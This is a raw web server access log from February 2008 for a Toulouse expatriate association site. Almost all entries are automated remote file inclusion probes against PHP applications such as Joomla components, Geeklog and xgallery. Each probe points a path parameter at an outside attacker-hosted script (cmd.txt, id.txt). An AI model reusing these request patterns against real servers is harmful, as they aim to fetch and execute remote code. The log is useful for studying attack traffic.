211.255.32.189 - - [17/Feb/2008:16:47:41 -0800] "GET /logs/access_071224.log/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.255.32.189 - - [17/Feb/2008:16:47:41 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.255.32.189 - - [17/Feb/2008:16:47:41 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
217.22.60.11 - - [17/Feb/2008:16:47:44 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.72.144.18 - - [17/Feb/2008:16:48:00 -0800] "GET /logs//ask_password.php?dir=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
69.72.144.18 - - [17/Feb/2008:16:48:00 -0800] "GET //ask_password.php?dir=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
69.72.144.18 - - [17/Feb/2008:16:48:01 -0800] "GET /logs//ask_password.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.toulouseangloexchange.com"
69.72.144.18 - - [17/Feb/2008:16:48:01 -0800] "GET /logs//ask_password.php?dir=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.toulouseangloexchange.com"
69.72.144.18 - - [17/Feb/2008:16:48:08 -0800] "GET //ask_password.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.toulouseangloexchange.com"
69.72.144.18 - - [17/Feb/2008:16:48:08 -0800] "GET //ask_password.php?dir=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.toulouseangloexchange.com"
211.255.32.189 - - [17/Feb/2008:16:48:09 -0800] "GET /logs/access_071224.log/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.255.32.189 - - [17/Feb/2008:16:48:09 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.255.32.189 - - [17/Feb/2008:16:48:10 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
85.12.50.119 - - [17/Feb/2008:16:48:29 -0800] "GET /logs//ask_password.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
85.12.50.119 - - [17/Feb/2008:16:48:29 -0800] "GET //ask_password.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.toulouseangloexchange.com"
85.12.50.119 - - [17/Feb/2008:16:48:29 -0800] "GET /logs//ask_password.php?dir=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
85.12.50.119 - - [17/Feb/2008:16:48:29 -0800] "GET //ask_password.php?dir=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
216.17.102.134 - - [17/Feb/2008:16:49:42 -0800] "GET //ask_password.php?dir=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
216.17.102.134 - - [17/Feb/2008:16:49:43 -0800] "GET //ask_password.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
216.17.102.134 - - [17/Feb/2008:16:49:43 -0800] "GET /logs//ask_password.php?dir=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
216.17.102.134 - - [17/Feb/2008:16:49:43 -0800] "GET //ask_password.php?dir=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
216.17.102.134 - - [17/Feb/2008:16:49:43 -0800] "GET /logs//ask_password.php?dir=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.toulouseangloexchange.com"
216.17.102.134 - - [17/Feb/2008:16:49:43 -0800] "GET /logs//ask_password.php?dir=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:50:51 -0800] "GET /logs/index.php?expose.html.php?mosConfig_absolute_path=http://viperwarez.com/scan/cmd.txt?%20%22com_expose%22http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:50:51 -0800] "GET /index.php?expose.html.php?mosConfig_absolute_path=http://viperwarez.com/scan/cmd.txt?%20%22com_expose%22http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
64.13.222.135 - - [17/Feb/2008:16:52:46 -0800] "GET /logs/access_071224.log/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.222.135 - - [17/Feb/2008:16:52:46 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
64.13.222.135 - - [17/Feb/2008:16:52:46 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
82.159.204.29 - - [17/Feb/2008:16:52:53 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.159.204.29 - - [17/Feb/2008:16:52:58 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.159.204.29 - - [17/Feb/2008:16:53:04 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:53:41 -0800] "GET /home.php?expose.html.php?mosConfig_absolute_path=http://viperwarez.com/scan/cmd.txt?%20%22com_expose%22http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:53:41 -0800] "GET /logs/home.php?expose.html.php?mosConfig_absolute_path=http://viperwarez.com/scan/cmd.txt?%20%22com_expose%22http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
222.135.109.228 - - [17/Feb/2008:16:54:26 -0800] "GET //ask_password.php?dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.135.109.228 - - [17/Feb/2008:16:54:26 -0800] "GET /logs//ask_password.php?dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:54:36 -0800] "GET /menu.php?expose.html.php?mosConfig_absolute_path=http://viperwarez.com/scan/cmd.txt?%20%22com_expose%22http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:54:36 -0800] "GET /logs/menu.php?expose.html.php?mosConfig_absolute_path=http://viperwarez.com/scan/cmd.txt?%20%22com_expose%22http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
220.90.217.61 - - [17/Feb/2008:16:55:26 -0800] "GET /logs/access_071126.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://66.153.86.221/www???????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
207.236.192.226 - - [17/Feb/2008:16:55:29 -0800] "GET /associationsMumsTots.html HTTP/1.1" 404 275 "http://www.newcomersclub.com/fr.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" "www.toulouseangloexchange.com"
207.236.192.226 - - [17/Feb/2008:16:55:30 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" "www.toulouseangloexchange.com"
222.255.3.68 - - [17/Feb/2008:16:55:37 -0800] "GET /logs/access_071203.log//phpSecurePages/secure.php?&cfgProgDir=http://www.aidhost.com/2ukAuction2//includes/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:55:58 -0800] "GET /file.php?expose.html.php?mosConfig_absolute_path=http://viperwarez.com/scan/cmd.txt?%20%22com_expose%22http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:55:58 -0800] "GET /logs/file.php?expose.html.php?mosConfig_absolute_path=http://viperwarez.com/scan/cmd.txt?%20%22com_expose%22http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
207.236.192.226 - - [17/Feb/2008:16:56:32 -0800] "GET /associationsMumsTots.html HTTP/1.1" 404 275 "http://www.newcomersclub.com/fr.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.toulouseangloexchange.com"
207.236.192.226 - - [17/Feb/2008:16:56:33 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:57:15 -0800] "GET /config.php?expose.html.php?mosConfig_absolute_path=http://viperwarez.com/scan/cmd.txt?%20%22com_expose%22http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:57:16 -0800] "GET /logs/config.php?expose.html.php?mosConfig_absolute_path=http://viperwarez.com/scan/cmd.txt?%20%22com_expose%22http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
82.159.204.29 - - [17/Feb/2008:16:57:35 -0800] "GET /logs/access.log//modules/Neos_Chronos/header.php?base_folder=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.159.204.29 - - [17/Feb/2008:16:57:35 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.159.204.29 - - [17/Feb/2008:16:57:35 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.255.3.68 - - [17/Feb/2008:16:57:36 -0800] "GET /logs/access_080127.log//phpSecurePages/secure.php?&cfgProgDir=http://www.aidhost.com/2ukAuction2//includes/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:57:42 -0800] "GET //update/update4.php?lang=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:16:57:42 -0800] "GET /logs//update/update4.php?lang=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
222.255.3.68 - - [17/Feb/2008:16:58:22 -0800] "GET /logs/access_071112.log//phpSecurePages/secure.php?&cfgProgDir=http://www.aidhost.com/2ukAuction2//includes/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
222.255.3.68 - - [17/Feb/2008:16:59:06 -0800] "GET /logs/access_071126.log//phpSecurePages/secure.php?&cfgProgDir=http://www.aidhost.com/2ukAuction2//includes/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
82.159.204.29 - - [17/Feb/2008:17:00:10 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:17:00:21 -0800] "GET /logs//update/update4.php?lang=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:17:00:21 -0800] "GET //update/update4.php?lang=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:17:00:22 -0800] "GET /logs/update/update4.php?lang=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
213.203.223.25 - - [17/Feb/2008:17:00:22 -0800] "GET /update/update4.php?lang=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.toulouseangloexchange.com"
222.255.3.68 - - [17/Feb/2008:17:01:09 -0800] "GET /logs/access_080121.log//phpSecurePages/secure.php?&cfgProgDir=http://www.aidhost.com/2ukAuction2//includes/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:01:13 -0800] "GET /logs/access_080127.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:01:13 -0800] "GET /logs/access_080127.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:01:13 -0800] "GET /xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:01:13 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:01:14 -0800] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:01:14 -0800] "GET /logs/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:01:21 -0800] "GET /logs/access_071224.log/index.php?prod=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:01:22 -0800] "GET /index.php?prod=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:01:22 -0800] "GET /logs/index.php?prod=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
84.40.23.83 - - [17/Feb/2008:17:02:22 -0800] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.40.23.83 - - [17/Feb/2008:17:02:22 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
84.40.23.83 - - [17/Feb/2008:17:02:22 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/putr4/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
82.159.204.29 - - [17/Feb/2008:17:03:19 -0800] "GET /logs/access_071126.log//modules/Neos_Chronos/header.php?base_folder=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:04:28 -0800] "GET /logs/access_080114.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.203.223.93 - - [17/Feb/2008:17:04:29 -0800] "GET /logs/access_080114.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.toulouseangloexchange.com"
213.193.222.218 - - [17/Feb/2008:17:05:52 -0800] "GET /logs/config.inc.php?path_escape=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.toulouseangloexchange.com"
222.135.109.228 - - [17/Feb/2008:17:07:18 -0800] "GET /logs/access_071119.log//ask_password.php?dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.135.109.228 - - [17/Feb/2008:17:07:40 -0800] "GET /logs/access_080127.log//ask_password.php?dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
82.100.220.42 - - [17/Feb/2008:17:08:47 -0800] "GET /config.inc.php?path_escape=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.191.36.35 - - [17/Feb/2008:17:09:41 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://svchost.site.voila.fr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
88.191.36.35 - - [17/Feb/2008:17:09:41 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://svchost.site.voila.fr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
140.99.23.86 - - [17/Feb/2008:17:10:27 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
211.230.148.86 - - [17/Feb/2008:17:10:43 -0800] "GET /logs/access_080127.log/index.php?body=http://www.burgnarren-waldburg.de/modules/xoopsgallery/platform/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
211.255.32.189 - - [17/Feb/2008:17:11:21 -0800] "GET /logs/access_071224.log/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.255.32.189 - - [17/Feb/2008:17:11:22 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
211.255.32.189 - - [17/Feb/2008:17:11:22 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.149.238.27 - - [17/Feb/2008:17:15:48 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.149.238.27 - - [17/Feb/2008:17:15:48 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
210.245.164.10 - - [17/Feb/2008:17:16:03 -0800] "GET /logs/access.log/index.php?prod=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
222.135.109.228 - - [17/Feb/2008:17:16:43 -0800] "GET /logs/access_071126.log//ask_password.php?dir=http://ecology.275mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
82.165.176.137 - - [17/Feb/2008:17:16:52 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
